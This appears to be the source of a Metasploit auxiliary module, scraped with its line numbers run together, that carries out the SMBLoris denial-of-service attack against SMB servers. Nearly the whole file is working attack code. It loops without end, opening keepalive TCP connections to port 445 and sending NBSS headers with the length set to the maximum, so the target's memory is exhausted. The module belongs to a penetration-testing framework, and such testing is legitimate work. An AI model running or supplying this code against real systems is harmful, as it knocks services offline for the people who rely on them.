Path: blob/master/modules/auxiliary/dos/smb/smb_loris.rb
19515 views
#!/usr/bin/env ruby12require 'socket'3require 'metasploit'45require 'bindata'67class NbssHeader < BinData::Record8endian :little9uint8 :message_type10bit7 :flags11bit17 :message_length12end1314metadata = {15name: 'SMBLoris NBSS Denial of Service',16description: %q{17The SMBLoris attack consumes large chunks of memory in the target by sending18SMB requests with the NetBios Session Service(NBSS) Length Header value set19to the maximum possible value. By keeping these connections open and initiating20large numbers of these sessions, the memory does not get freed, and the server21grinds to a halt. This vulnerability was originally disclosed by Sean Dillon22and Zach Harding.2324DISCLAIMER: This module opens a lot of simultaneous connections. Please check25your system's ULIMIT to make sure it can handle it. This module will also run26continuously until stopped.27},28authors: [29'thelightcosine',30'Adam Cammack <adam_cammack[at]rapid7.com>'31],32date: '2017-06-29',33references: [34{ type: 'url', ref: 'https://web.archive.org/web/20170804072329/https://smbloris.com/' },35{ type: 'aka', ref: 'SMBLoris' }36],37type: 'dos',38options: {39rhost: { type: 'address', description: 'The target address', required: true, default: nil },40rport: { type: 'port', description: 'SMB port on the target', required: true, default: 445 }41}42}4344def run(args)45header = NbssHeader.new46header.message_length = 0x01FFFF4748last_reported = 049warned = false50n_loops = 051sockets = []5253target = Addrinfo.tcp(args[:rhost], args[:rport].to_i)5455Metasploit.logging_prefix = "#{target.inspect_sockaddr} - "5657loop do58sockets.delete_if(&:closed?)5960nsock = target.connect(timeout: 360)61nsock.setsockopt(Socket::SOL_SOCKET, Socket::SO_KEEPALIVE, true)62nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPCNT, 5))63nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPINTVL, 10))64nsock.setsockopt(Socket::Option.linger(true, 60))65nsock.write(header.to_binary_s)66sockets << nsock6768n_loops += 169if last_reported != sockets.length70if n_loops % 100 == 071last_reported = sockets.length72Metasploit.log "#{sockets.length} socket(s) open", level: 'info'73end74elsif n_loops % 1000 == 075Metasploit.log "Holding steady at #{sockets.length} socket(s) open", level: 'info'76end77rescue Interrupt78sockets.each(&:close)79break80rescue Errno::EMFILE81Metasploit.log "At open socket limit with #{sockets.length} sockets open. Try increasing your system limits.", level: 'warning' unless warned82warned = true83sockets.slice(0).close84rescue StandardError => e85Metasploit.log "Exception sending packet: #{e.message}", level: 'error'86end87end8889if __FILE__ == $PROGRAM_NAME90Metasploit.run(metadata, method(:run))91end929394